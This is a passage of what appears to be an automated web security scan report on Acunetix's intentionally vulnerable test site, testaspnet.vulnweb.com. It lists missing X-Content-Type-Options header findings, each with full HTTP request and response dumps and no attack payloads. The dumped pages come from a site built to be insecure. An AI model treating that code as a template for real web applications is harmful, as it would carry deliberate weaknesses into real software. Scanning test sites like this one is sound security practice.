align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=3
Method	GET
Parameter	X-Content-Type-Options
Attack
Evidence
Show / hide Request and Response
Request Header - size: 350 bytes.	GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=3 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 18040
Response Body - size: 18,040 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=3" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8+aGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+QWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A+ICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgIeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTNkZAILDxYCHgNzcmMFDGFkcy9kZWYuaHRtbGRkSGybNfT47lMyCtVUwkelFkD9wY8=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLEirm5BAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBGR35lZNwQ8OqxiqiZO/ZZOlJz58" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:37:35 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV> <DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently, therefore it is not recommended that the same beta version is used for more than 30 days. To beta-test beyond 30 days, users should install the latest beta version or, if available, use the release version.</p> <p><strong>About Acunetix Web Vulnerability Scanner</strong><br /> Acunetix Web Vulnerability Scanner, a unique web application scanning product that makes securing one’s website easier than ever. Acunetix Web Vulnerability Scanner is an automated web application security testing tool that crawls an entire website and attacks it so as to identify potential weaknesses before hackers do. Further information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/robots.txt
Method	GET
Parameter	X-Content-Type-Options
Attack
Evidence
Show / hide Request and Response
Request Header - size: 282 bytes.	GET http://testaspnet.vulnweb.com/robots.txt HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 245 bytes.	HTTP/1.1 200 OK Content-Type: text/plain Last-Modified: Mon, 06 May 2019 12:46:42 GMT Accept-Ranges: bytes ETag: "b0b05ac194d51:0" Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:14 GMT Content-Length: 13
Response Body - size: 13 bytes.	User-agent: *
URL	http://testaspnet.vulnweb.com/rssFeed.aspx
Method	GET
Parameter	X-Content-Type-Options
Attack
Evidence
Show / hide Request and Response
Request Header - size: 324 bytes.	GET http://testaspnet.vulnweb.com/rssFeed.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 220 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/xml; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 2118
Response Body - size: 2,118 bytes.	<rss version="2.0"> <channel> <title>Acunetix testaspnet</title> <link>http://testaspnet.acunetix.com/</link> <description> This is the syndication feed for testaspnet.acunetix.com. </description> <item> <title>Acunetix Vulnerability Scanner Now With Network Security Scans</title> <description> Seamless OpenVAS integration now also available on Windows and Linux </description> <link> http://testaspnet.acunetix.com/ReadNews.aspx?id=0 </link> <author>admin </author> <pubDate> Thu, 16 May 2019 12:32:30 GMT </pubDate> </item> <item> <title>Acunetix Web Vulnerability Scanner beta released!</title> <description> 26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/. </description> <link> http://testaspnet.acunetix.com/ReadNews.aspx?id=3 </link> <author>admin </author> <pubDate> Tue, 08 Nov 2005 11:37:35 GMT </pubDate> </item> <item> <title>Web attacks - can your web applications withstand the force?</title> <description> 21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed. </description> <link> http://testaspnet.acunetix.com/ReadNews.aspx?id=2 </link> <author>admin </author> <pubDate> Tue, 08 Nov 2005 11:35:22 GMT </pubDate> </item> </channel> </rss>
URL	http://testaspnet.vulnweb.com/Signup.aspx
Method	GET
Parameter	X-Content-Type-Options
Attack
Evidence
Show / hide Request and Response
Request Header - size: 323 bytes.	GET http://testaspnet.vulnweb.com/Signup.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 13106
Response Body - size: 13,106 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Signup</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="Signup.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTY0MzI4NjU4Mw9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLWF2wpV006tz0eDdoKfDbx+i81I" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="36F90C25" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" 